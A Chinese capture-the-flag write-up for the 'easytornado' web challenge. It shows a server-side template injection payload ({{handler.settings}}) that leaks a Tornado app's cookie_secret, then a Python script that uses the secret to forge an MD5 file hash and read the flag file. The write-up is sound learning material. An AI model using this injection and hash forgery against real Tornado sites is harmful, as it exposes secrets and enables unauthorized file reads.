攻防世界:web easytornado

真不easy

提取有用信息:

打开网站,发现有三个文件image

  • flag.txt: 告诉了我们flag的位置image
  • welcome.txt:告诉我们这是和render渲染函数有关,即可能存在SSTI漏洞image
  • hints.txt: 告诉了我们某个东西的加密方式image
    根据经验,盲猜这是个身份验证的秘钥,看见URL后面的东西像MD5加密后的密文,所以猜测可能就是filehash的值image

所以,我们访问/fllllllllllllag文件获取flag的格式就是:http://...//file?filename=/fllllllllllllag&filehash=xxxxxxxxxxxxxxxxxxxxxxxxxx

寻找漏洞

我们要寻找的肯定是SSTI漏洞
我们发现,只要在URL后面输入{{...}}的内容一定会跳转到error网站image
那就猜想这个网站可能有SSTI漏洞咯image
果然存在SSTI漏洞,那么现在就是招漏洞注入点

百度,找tornado的特点:

你也不知道,所以百度:tornado的漏洞
其实也不需要看懂,碰到了查一下就好image
注入:/error?msg={{handler.settings}}

image
得到了一串:
根据加密规则,写python脚本进行加密

import hashlib
filename='/fllllllllllllag'
cookie_security="557da611-8ab8-4cd2-916d-e075279074cd"


def getvalue(string):
	md5=hashlib.md5()
	md5.update(string.encode('utf-8'))
	return md5.hexdigest() #返回十六进制md5值(默认返回的是二进制)
def merge():
	flag=getvalue(cookie_security+getvalue(filename))
	#print(flag)
	payload='http://111.200.241.244:58389/file?filename=/fllllllllllllag&filehash='+flag
	print(payload)
if __name__=='__main__':
	merge()

得到image
直接输入这个URL就好了image

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值